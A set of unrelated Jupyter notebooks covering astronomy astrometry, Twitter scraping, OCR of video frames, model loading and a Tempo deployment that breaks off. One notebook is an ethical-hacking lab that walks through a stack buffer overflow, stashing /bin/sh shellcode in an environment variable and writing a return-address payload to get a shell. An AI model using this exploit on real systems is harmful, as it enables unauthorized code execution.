sample_control_nc = join(Table([sample_control_nc], names = ['source_id']), sample_gaia) ; sample_control_nc.label = 'Control'
print('N Control Sources NOT in common: ', len(sample_control_nc))
# -
# ## 1.- Examine Source sky-projected distribution
# Mark Highest extinction point for later ======
l1688 = SkyCoord('16h26m57s', '-24d31m00s', frame='icrs') # Obtained by eye (see previous notebook, Cell #8)
sample_common['l1688_sep'] = [l1688.separation(SkyCoord(inp['ra'], inp['dec'], unit = (u.deg, u.deg))).degree for inp in sample_common]
sample_common['l1688_sep'].unit = u.degree
sample_common['l1688_sep'].format = '%5.3f'
# +
# Study object distribution =====================
radius = 0.6
sample_common_r06 = sample_common[sample_common['l1688_sep'] < radius]
n_els_r06 = len(sample_common_r06)
print(f'L1688 Core Coordinates: {l1688.ra.deg:17.1f}, {l1688.dec.deg:7.1f}')
print(f'N_Elements inside r < 0.6\degr: {n_els_r06:17.1f}')
print(f'% Elements inside r < 0.6\degr: {n_els_r06/len(sample_common) * 100.:17.1f}')
# Find how many are new =========================
control_r06_y = join(sample_common_r06, sample_control, keys='source_id')
control_r06_n = np.setdiff1d(sample_common_r06['source_id'], sample_control['source_id'])
control_r06_n = join(sample_common_r06, Table([control_r06_n], names=['source_id']))
print()
print(f'Total Control-N sources: {len(control_r06_n):25.1f}')
print(f'Total Control-Y sources: {len(control_r06_y):25.1f}')
# +
# Estimate Density distribution of objects ======
radius = np.arange(0.1,2,0.1)
n_els, dens = [], []
for radii in radius:
els = len(sample_common[sample_common['l1688_sep'] < radii])
n_els.append(els)
dens.append(els/(np.pi * (radii**2)))
fig = plt.figure(figsize=[20,5])
plt.subplot(121)
plt.xlabel('N_els')
plt.ylabel('Radius')
plt.plot(radius, n_els, 'ko')
plt.subplot(122)
plt.xlabel('Density')
plt.ylabel('Radius')
plt.plot(radius, dens, 'ko')
plt.show()
# Investigate distances distribution ===
reg_inn = sample_common[sample_common['l1688_sep'] < 0.6]
reg_out = sample_common[sample_common['l1688_sep'] > 0.6]
textt = itertools.cycle(['Average Distance inside r <0.6degs: ', 'Average Distance outside r <0.6degs:'])
for inp in [reg_inn, reg_out]:
print(f'{next(textt)} {inp["distance"].mean():10.1f} +/- {inp["distance"].std():3.1f}')
# -
# ## 2.- Examine proper motions distribution
# +
# Plot PMRA VS PMDEC ===========================
clusters = [sample_gaia, sample_control_nc, sample_common]
figname = '05_astrometry_analysis_0.pdf'
inp_col_1 = 'pmra'
inp_col_2 = 'pmdec'
label_1 = r'$\mu_{\alpha}^{*}$ [mas yr$^{-1}$]'
label_2 = r'$\mu_{\delta}$ [mas yr$^{-1}$]'
x_err = clusters[0][inp_col_1 + '_error'].mean()
y_err = clusters[0][inp_col_2 + '_error'].mean()
ftsize = 18
xlim = [-16.5,-1.5]
ylim = [-32,-15]
markersizes = itertools.cycle([10,4,4])
colors = itertools.cycle(['grey', 'magenta', 'cyan'])
alphas = itertools.cycle([0.4, 1.0, 1.0])
# Start Plot ==========
fig = plt.figure(figsize=[7,7])
plt.xlim(xlim)
plt.ylim(ylim)
plt.xlabel(label_1, fontsize = ftsize)
plt.ylabel(label_2, fontsize = ftsize)
plt.xticks(fontsize = ftsize)
plt.yticks(fontsize = ftsize)
for cluster in clusters:
plt.plot(cluster[inp_col_1], cluster[inp_col_2], 'o', markersize = next(markersizes),
mew = 0, color = next(colors), alpha = next(alphas), label = cluster.label)
plt.legend(loc = 'upper right', fontsize = ftsize, handletextpad= -0.4, framealpha = 1.0)
plt.show()
fig.savefig(figname, bbox_inches = 'tight', overwrite = True)
# +
# Plot Outputs =================================
clusters = Comparison()
clusters.load_clusters(sample_control, cluster_list = [sample_common])
clusters.read_wise_fits(wise_fits_path=path_wise_img)
clusters.plot_wise_img_1(markersize=7, mew=2.5, figname='05_astrometry_analysis_1.pdf',
control_on_top = False, ftsize=22, mec_1='yellow', mec_2='lightgrey', legend_color='no_legend', cl_index = 0)
# -
# ## 3.- Examine histograms & Compare to UpperSco
# +
# Read Galli2018 table ====================================
galli = Table.read('galli_2018.vot') # USco members from Galli et al. 2018 (MNRAS)
galli.convert_bytestring_to_unicode()
coords = SkyCoord(galli['RAJ2000'], galli['DEJ2000'], unit=(u.hourangle, u.deg))
galli['RAJ2000_2'] = coords.ra.deg
galli['DEJ2000_2'] = coords.dec.deg
# Extract Objects with Trigonometric Parallax =============
galli = galli[galli['plxTRIG'].mask == False]
control = True #Dealing with control sample?
if control:
galli_2 = galli[galli['CTRL'] == 'Y']
galli_cols = []
for col in ['RAJ2000_2', 'DEJ2000_2', 'plxTRIG', 'pmRA', 'pmDE']:
print(f'{col:10s} {galli_2[col].mean():10.1f} +/- {galli_2[col].std():5.1f}')
galli_cols.append(galli_2[col].mean())
# Plot Histogram ===========
galli = Basic_Plotters(galli)
hists = galli.plot_3_hist(inp_col_1='plxTRIG', inp_col_2='pmRA', inp_col_3='pmDE')
# +
# Fit 2 Gaussians to the histograms =======================
hist_0 = clusters.plot_3_hist(fig = True, ylabel_1='# Objects')
fig = plt.figure(figsize=[30,10])
index = 1
linewidth = 5
ftsize = 38
cols = ['parallax', 'pmra', 'pmdec']
colors = itertools.cycle(["red"]) # Input must be iterable
fig0 = False
# Parallax Hist ===============
plt.subplot(131)
out = clusters.plot_hist(inp_col = cols[0], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=5, show_legend=True, show_ylabel = '# Objects')
plt.axvline(x=galli_cols[2], linestyle = '-.', linewidth = linewidth*1.5)
# PMRA Hist ===================
print('PMRA Gaussian Fit Results ===================')
plt.subplot(132)
out = clusters.plot_hist(inp_col = cols[1], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=5, xlim=[-16,-2])
gfits_r = samp_comp.gauss_2_fit(out['bin_c'][index], out['bin_h'][index], gauss_1 = (65, -7, 2.), gauss_2 = (10, -14, 2.), fit_LevMar=True, verbose = True, vline=None)
plt.axvline(x=galli_cols[3], linestyle = '-.', linewidth = linewidth*1.5)
print()
# PMDEC Hist ==================
print('PMDEC Gaussian Fit Results ===================')
plt.subplot(133)
out = clusters.plot_hist(inp_col = cols[2], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=4, xlim=[-30,-19])
gfits_d = samp_comp.gauss_2_fit(out['bin_c'][index], out['bin_h'][index], gauss_1 = (70, -25, 0.5), gauss_2 = (15, -22, 0.5), fit_LevMar=True, verbose = True, vline=None)
plt.axvline(x=galli_cols[4], linestyle = '-.', linewidth = linewidth*1.5)
plt.show()
figname = '05_astrometry_analysis_2.pdf'
fig.savefig(figname, bbox_inches = 'tight', overwrite = True)
# +
# LATEX Table =================
col_0 = ['Mean', 'FWHM', 'Mean', 'FWHM']
s2fwhm = 2.355 # Sigma >> FWHM for Gaussian Distribution
col_1_m = [gfits_r.mean_0.value, s2fwhm*gfits_r.stddev_0.value, gfits_r.mean_1.value, s2fwhm*gfits_r.stddev_1.value]
col_2_m = [gfits_d.mean_0.value, s2fwhm*gfits_d.stddev_0.value, gfits_d.mean_1.value, s2fwhm*gfits_d.stddev_1.value]
col_1_e = [gfits_r.mean_0_err, s2fwhm*gfits_r.stddev_0_err, gfits_r.mean_1_err, s2fwhm*gfits_r.stddev_1_err]
col_2_e = [gfits_d.mean_0_err, s2fwhm*gfits_d.stddev_0_err, gfits_d.mean_1_err, s2fwhm*gfits_d.stddev_1_err]
names = [' ', 'pmra', 'pmra_e', 'pmdec', 'pmdec_e']
gfits_tb = Table([col_0, col_1_m, col_1_e, col_2_m, col_2_e], names = names)
for col in names[1:]:
gfits_tb[col] = ['{:3.1f}'.format(inp) for inp in gfits_tb[col]]
# Save table ==================
gfits_tb['pmra'] = ['$' + gfits_tb['pmra'][i] + '\pm' + gfits_tb['pmra_e'][i] + '$' for i in range(len(gfits_tb))]
gfits_tb['pmdec'] = ['$' + gfits_tb['pmdec'][i] + '\pm' + gfits_tb['pmdec_e'][i] + '$' for i in range(len(gfits_tb))]
gfits_tb.remove_columns(['pmra_e', 'pmdec_e'])
gfits_tb.write('05_astrometry_analysis_gaussians.tex')
# !open 05_astrometry_analysis_gaussians.tex
gfits_tb
# +
# Find Histogram Peaks ==============
# Index of Common Sample in Clusters list (0 = Control, 1 = Common)
hist_index = 1
hists_p_b, hists_p_h = samp_comp.get_hist(hist_0, hist_label='hist_1', hist_index=hist_index)
hists_pmr_b, hists_pmr_h = samp_comp.get_hist(hist_0, hist_label='hist_2', hist_index=hist_index)
hists_pmd_b, hists_pmd_h = samp_comp.get_hist(hist_0, hist_label='hist_3', hist_index=hist_index)
# Parallax =
print('parallax Histogram Peaks')
peaks = peakutils.indexes(hists_p_h, thres=0.5) # Peak indexes. Threshold Normalized Threshold
for peak in peaks:
print(f'{hists_p_b[peak]:10.1f}{hists_p_h[peak]:10.0f}')
print()
# PMRA =====
print('PMRA Histogram Peaks')
peaks = peakutils.indexes(hists_pmr_h, thres=0.2) # Peak indexes. Threshold Normalized Threshold
for peak in peaks:
print(f'{hists_pmr_b[peak]:10.1f}{hists_pmr_h[peak]:10.0f}')
print()
# PMDEC ====
print('PMDEC Histogram Peaks')
peaks = peakutils.indexes(hists_pmd_h, thres=0.1) # Peak indexes. Threshold Normalized Threshold
for peak in peaks:
print(f'{hists_pmd_b[peak]:10.1f}{hists_pmd_h[peak]:10.0f}')
# -
# Obtain Average values ========================
out = [clusters.get_stats_all(cluster_label=label) for label in ['Control', 'Common']]
paper_tb = out[1]
paper_tb.write('05_astrometry_analysis_average.tex', format = 'ascii.latex', overwrite = True)
# !open 05_astrometry_analysis_average.tex
paper_tb
# +
parallaxes = clusters.get_stats('parallax')
para_m = parallaxes['Common']['mean']
para_s = parallaxes['Common']['std']
dist_m = 1000./para_m
dist_u = dist_m - 1000./(para_m + para_s)
dist_b = 1000./(para_m - para_s) - dist_m
print(f'Average distance: {dist_m:9.1F} - {dist_u:3.1F} + {dist_b:3.1F}')
print()
# -
# Print min/max parallaxes ============
samples = itertools.cycle(['Control:', 'Common:'])
for inp in [sample_control, sample_common]:
samp = next(samples)
print(f'{samp:10s} {inp["parallax"].min():6.1f} {inp["parallax"].max():7.1f}')
print(f'{samp:10s} {1000./inp["parallax"].min():6.1f} {1000./inp["parallax"].max():7.1f}')
# +
# Add Galactic coordinates and compute XYZ in this frame
test = Basic()
test.load_gaia_cat(sample_common)
test.to_galactic()
test.compute_3D_galactic()
for col in ['X_gal', 'Y_gal', 'Z_gal']:
test.get_stats(col)
# -
|
sample_comp/05_astrometry_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={} tags=["naas", "awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# # Twitter - Get tweets from search
# <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/Twitter/Twitter_Get_tweets_from_search.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a>
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# **Tags:** #twitter #ifttt #naas_drivers #snippet #content #dataframe
# + [markdown] papermill={} tags=["naas", "awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# **Author:** [<NAME>](https://github.com/dineshh912)
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Input
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Import libraries
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
import tweepy
import pandas as pd
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### API Credentials
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
consumer_key = "<KEY>"
consumer_secret = "<KEY>"
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### How to generate API Keys?
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# [Twitter API Documentation](https://developer.twitter.com/en/docs/getting-started)
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Model
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Authentification
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
try:
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
api = tweepy.API(auth)
except BaseException as e:
print(f"Authentication has been failed due to -{str(e)}")
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Fonctions
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
def getTweets(search_words, date_since, numTweets):
# Define a pandas dataframe to store the date:
tweets_df = pd.DataFrame(columns = ['username', 'desc', 'location', 'following',
'followers', 'totaltweets', 'usercreated', 'tweetcreated',
'retweetcount', 'text', 'hashtags']
)
# Collect tweets using the Cursor object
# .Cursor() returns an object that you can iterate or loop over to access the data collected.
tweets = tweepy.Cursor(api.search, q=search_words, lang="en", since=date_since, tweet_mode='extended').items(numTweets)
# Store tweets into a python list
tweet_list = [tweet for tweet in tweets]
for tweet in tweet_list:
username = tweet.user.screen_name
desc = tweet.user.description
location = tweet.user.location
following = tweet.user.friends_count
followers = tweet.user.followers_count
totaltweets = tweet.user.statuses_count
usercreated = tweet.user.created_at
tweetcreated = tweet.created_at
retweetcount = tweet.retweet_count
hashtags = tweet.entities['hashtags']
try:
text = tweet.retweeted_status.full_text
except AttributeError:
text = tweet.full_text
tweet_data = [username, desc, location, following, followers, totaltweets,
usercreated, tweetcreated, retweetcount, text, hashtags]
tweets_df.loc[len(tweets_df)] = tweet_data
return tweets_df
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Initialise these function attributes:
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
search_words = "#jupyterlab OR #python OR #naas OR #naasai"
date_since = "2021-09-21"
numTweets = 50
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Output
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Get the tweets
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
df = getTweets(search_words, date_since, numTweets)
|
Twitter/Twitter_Get_tweets_from_search.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Stack Overflow - Exploiting with Env Variable
#
# - often times buffer that has overflow vulnerability is not large enough to fit even the smallest shellcode
# - in sitation like this, one can stash the shellcode as an environment variable and overwrite the caller's return address with the address of the shellcode stored in environment variable
# - environment variables are loaded into the memory everytime a program is loaded into memory bydefault
# - one can also execute program without loading the environment variable, however
# - **env -i ./program** command, e.g., ignores environment variable when running a program
# - let's look at how we can programmatically find the address of environment variables using C++
# - C stanard library's **getenv()** accepts the name of an environment variable as its only argument and returns that variable's memory address
# - **getenvaddr.cpp** demo provides fairly accurate location by accounting for the length of the target program's name that's also loaded on stack
# ! cat ./demos/stack_overflow/getenvaddr.cpp
# + language="bash"
# input="./demos/stack_overflow/getenvaddr.cpp"
# output=getenvaddr.exe
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# ! ./getenvaddr.exe
# ! ./getenvaddr.exe PATH ./getenvaddr.exe
# ### Note
# - the `./getenvaddr.exe` program provides different address when the above command is directly executed from the terminal compared to running it from the Jupyter notebook
# - the address retrieved from the terminal is the one we need as we'll be exploiting the program directly from terminal and not from the Jupyter notebook!
# - the following snippet shows the PATH address when executed from the terminal
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./getenvaddr.exe PATH ./getenvaddr.exe
# PATH will be at 0xffffc80a with reference to ./getenvaddr.exe
# ```
#
# ### Export shellcode
# - let's copy `shellcode.bin` from the `demos/shellcode` folder and export it as an environment variable
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cp ./demos/shellcode/shellcode.bin .
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ wc -c shellcode.bin
# 24 shellcode.bin
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ export SHELLCODE=$(cat shellcode.bin)
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ echo $SHELLCODE | hexdump -C
# 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 31 |1.Ph//shh/bin..1|
# 00000010 c9 89 ca 6a 0b 58 cd 80 0a |...j.X...|
# 00000019
#
# ```
#
# ### Expoit so_env.cpp
# - let's copy and compile the file and exploit it using the shellcode stashed in environment variable
# - the program has buffer size of 16 bytes which is not big enough to hold our 24 bytes shellcode
# ! cat ./demos/stack_overflow/so_env.cpp
# + language="bash"
# input="./demos/stack_overflow/so_env.cpp"
# output="so_env.exe"
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# ### crash the program
# ! python -c 'print("A"*10)' | ./so_env.exe
# ! python -c 'print("A"*30)' | ./so_env.exe
# - first, find the address of `SHELLCODE` environment variable with respect to `so_env.exe`
# - repeat the address of `SHELLCODE` enough to overwrite the caller's return address in `bad()`
# - VOILA!
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./getenvaddr.exe SHELLCODE ./so_env.exe
# SHELLCODE will be at 0xffffdfa9 with reference to ./so_env.exe
# ```
# - since the program recieves the data from standard input, we'll create a payload file with the repeated SHELLCODE address (little endian)
# ! python -c 'import sys; sys.stdout.buffer.write(b"\xa9\xdf\xff\xff"*20)' > payload_env.bin
# ! wc -c payload_env.bin
# - now that the payload_env.txt is created we'll pipe it to the program as stdio
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cat payload_env.bin - | ./so_env.exe
#
# Enter text: text = ��������������������������������������������������������������������������������
# whoami
# kali
# date
# Thu Dec 17 00:26:43 MST 2020
# exit
#
# ```
# - the shellcode doesn't provide the prompt and you have to hit enter on a blank line to end the stdandard input buffer
|
StackOverflow-EnvVariable.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Maps for my data science project
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_49fd03c3e444d6b22e9bd739e9c60eb8.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_a4b91ebc367c3c4fe89f58cb5f350f75.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_efc448e8403300d1f1c934b3098d0d3a.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_4eda0dbbf214fbdfd5477e5472a4e149.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_49becf2cf26923789bd4c46dad762209.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_b9cdb4cd6b3bc477a7380225601011e9.html"></iframe>
# </figure>
# <!-- blank line -->
# -
|
final_project/Maps.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import cv2
import os
import glob
from pytube import YouTube
#pip install fuzzywuzzy
from fuzzywuzzy import fuzz
import pytesseract
curr_url = "https://www.youtube.com/watch?v=VO5vKowfMOQ&t=7s"
# -
def extract_images_from_video(video, target_path, frequency=15, name="file", max_images=20, silent=False):
vidcap = cv2.VideoCapture(video)
frame_count = 0
time_sec = 0
num_images = 0
folder = target_path
label = 0
success = True
fps = int(vidcap.get(cv2.CAP_PROP_FPS))
list = []
success, image = vidcap.read()
while success and num_images < max_images:
num_images += 1
label += 1
file_name = name + "_" + str(num_images) + ".jpg"
list.append((file_name,time_sec))
path = os.path.join(folder, file_name)
print(path)
cv2.imwrite(path, image)
if cv2.imread(path) is None:
os.remove(path)
else:
if not silent:
print(f'Image successfully written at {path}')
frame_count += frequency * fps #skips secends
time_sec += frequency
vidcap.set(1, frame_count)
success, image = vidcap.read()
return (list);
import pytesseract
# download from here https://github.com/UB-Mannheim/tesseract/wiki
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
def extract_time_titles_changed(listi,change_threshold):
wantedTimes=[]
index = 0
(file_name,time) = listi[index]
img = cv2.imread(file_name)
last_text = pytesseract.image_to_string(img)
index += 1
while index < len(listi):
(file_name,time) = listi[index]
img = cv2.imread(file_name)
text = pytesseract.image_to_string(img)
if text:
# compare similarity between the last text and the new one
if fuzz.ratio(text.lower(),last_text.lower()) > change_threshold:
wantedTimes.append(time)
index+=1
last_text = text
return wantedTimes
def get_time_titles_changed_with_downlode(video_url, target_path, wanted_frequency, fileName ):
print(video_url)
youtube = YouTube(video_url)
# download youtube video
youtube.streams.first().download(target_path,filename=fileName)
arr = []
#videoPath = "C:/Users/Sarit/Desktop/final_proj/The Apriori algorithm.mp4"
wanted_file_path=target_path+'/'+fileName+'.mp4'
print(wanted_file_path)
arr = extract_images_from_video(wanted_file_path,target_path, frequency=wanted_frequency, name="The Apriori algorithm.mp4", max_images=1500, silent=False)
print(extract_time_titles_changed(arr))
def get_time_titles_changed(video_path, wanted_frequency, change_threshold):
target_path = os.getcwd();
print(target_path)
video_name=video_path.rsplit('/',1)[1] # take from right the first / to get the name
print(video_name)
images = extract_images_from_video(video_path, target_path, frequency = wanted_frequency, name=video_name, max_images=1500, silent=True)
return extract_time_titles_changed(images, change_threshold)
# +
#get_time_titles_changed_with_downlode('https://www.youtube.com/watch?v=2mC1uqwEmWQ','C:/Users/sarit/Desktop/final_proj',30,'The Apriori algorithm')
# -
get_time_titles_changed('C:/Users/sarit/Desktop/final_proj/The Apriori algorithm.mp4', wanted_frequency=30, change_threshold=75)
|
notebooks/collect_text_changes_time.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.9.7 64-bit (''conda-tf'': conda)'
# name: python3
# ---
import tensorflow as tf
from tensorflow.keras.models import load_model
import tensorflow.keras.backend as K
tf.version.VERSION
def get_f1(y_true, y_pred): #taken from old keras source code
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
recall = true_positives / (possible_positives + K.epsilon())
f1_val = 2*(precision*recall)/(precision+recall+K.epsilon())
return f1_val
model = tf.keras.models.load_model("../../assets/models/conv_model_70_epochs", custom_objects={'get_f1': get_f1})
model.summary()
model.get_layer(index=0).input_shape[0][1:3]
|
research/src/notebooks/model_evaluation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Model Explainer Example
#
# 
#
# In this example we will:
#
# * [Describe the project structure](#Project-Structure)
# * [Train some models](#Train-Models)
# * [Create Tempo artifacts](#Create-Tempo-Artifacts)
# * [Run unit tests](#Unit-Tests)
# * [Save python environment for our classifier](#Save-Classifier-Environment)
# * [Test Locally on Docker](#Test-Locally-on-Docker)
# * [Production on Kubernetes via Tempo](#Production-Option-1-(Deploy-to-Kubernetes-with-Tempo))
# * [Prodiuction on Kuebrnetes via GitOps](#Production-Option-2-(Gitops))
# ## Prerequisites
#
# This notebooks needs to be run in the `tempo-examples` conda environment defined below. Create from project root folder:
#
# ```bash
# conda env create --name tempo-examples --file conda/tempo-examples.yaml
# ```
# ## Project Structure
# !tree -P "*.py" -I "__init__.py|__pycache__" -L 2
# ## Train Models
#
# * This section is where as a data scientist you do your work of training models and creating artfacts.
# * For this example we train sklearn and xgboost classification models for the iris dataset.
# +
import os
import logging
import numpy as np
import json
import tempo
from tempo.utils import logger
from src.constants import ARTIFACTS_FOLDER
logger.setLevel(logging.ERROR)
logging.basicConfig(level=logging.ERROR)
# +
from src.data import AdultData
data = AdultData()
# +
from src.model import train_model
adult_model = train_model(ARTIFACTS_FOLDER, data)
# +
from src.explainer import train_explainer
train_explainer(ARTIFACTS_FOLDER, data, adult_model)
# -
# ## Create Tempo Artifacts
#
# +
from src.tempo import create_explainer, create_adult_model
sklearn_model = create_adult_model()
Explainer = create_explainer(sklearn_model)
explainer = Explainer()
# + code_folding=[0]
# # %load src/tempo.py
import os
from typing import Any, Tuple
import dill
import numpy as np
from alibi.utils.wrappers import ArgmaxTransformer
from src.constants import ARTIFACTS_FOLDER, EXPLAINER_FOLDER, MODEL_FOLDER
from tempo.serve.metadata import ModelFramework
from tempo.serve.model import Model
from tempo.serve.pipeline import PipelineModels
from tempo.serve.utils import pipeline, predictmethod
def create_adult_model() -> Model :
sklearn_model = Model(
name="income-sklearn",
platform=ModelFramework.SKLearn,
local_folder=os.path.join(ARTIFACTS_FOLDER, MODEL_FOLDER),
uri="gs://seldon-models/test/income/model",
)
return sklearn_model
def create_explainer(model: Model) -> Tuple[Model, Any]:
@pipeline(
name="income-explainer",
uri="s3://tempo/explainer/pipeline",
local_folder=os.path.join(ARTIFACTS_FOLDER, EXPLAINER_FOLDER),
models=PipelineModels(sklearn=model),
)
class ExplainerPipeline(object):
def __init__(self):
pipeline = self.get_tempo()
models_folder = pipeline.details.local_folder
explainer_path = os.path.join(models_folder, "explainer.dill")
with open(explainer_path, "rb") as f:
self.explainer = dill.load(f)
def update_predict_fn(self, x):
if np.argmax(self.models.sklearn(x).shape) == 0:
self.explainer.predictor = self.models.sklearn
self.explainer.samplers[0].predictor = self.models.sklearn
else:
self.explainer.predictor = ArgmaxTransformer(self.models.sklearn)
self.explainer.samplers[0].predictor = ArgmaxTransformer(self.models.sklearn)
@predictmethod
def explain(self, payload: np.ndarray, parameters: dict) -> str:
print("Explain called with ", parameters)
self.update_predict_fn(payload)
explanation = self.explainer.explain(payload, **parameters)
return explanation.to_json()
#explainer = ExplainerPipeline()
#return sklearn_model, explainer
return ExplainerPipeline
# -
# ## Save Explainer
#
# !cat artifacts/explainer/conda.yaml
tempo.save(Explainer)
# ## Test Locally on Docker
#
# Here we test our models using production images but running locally on Docker. This allows us to ensure the final production deployed model will behave as expected when deployed.
# +
from tempo.seldon import SeldonDockerRuntime
docker_runtime = SeldonDockerRuntime()
docker_runtime.deploy(explainer)
docker_runtime.wait_ready(explainer)
# -
r = json.loads(explainer(payload=data.X_test[0:1], parameters={"threshold":0.90}))
print(r["data"]["anchor"])
r = json.loads(explainer.remote(payload=data.X_test[0:1], parameters={"threshold":0.99}))
print(r["data"]["anchor"])
docker_runtime.undeploy(explainer)
# ## Production Option 1 (Deploy to Kubernetes with Tempo)
#
# * Here we illustrate how to run the final models in "production" on Kubernetes by using Tempo to deploy
#
# ### Prerequisites
#
# Create a Kind Kubernetes cluster with Minio and Seldon Core installed using Ansible from the Tempo project Ansible playbook.
#
# ```
# ansible-playbook ansible/playbooks/default.yaml
# ```
# !kubectl apply -f k8s/rbac -n production
from tempo.examples.minio import create_minio_rclone
import os
create_minio_rclone(os.getcwd()+"/rclone-minio.conf")
tempo.upload(sklearn_model)
tempo.upload(explainer)
# +
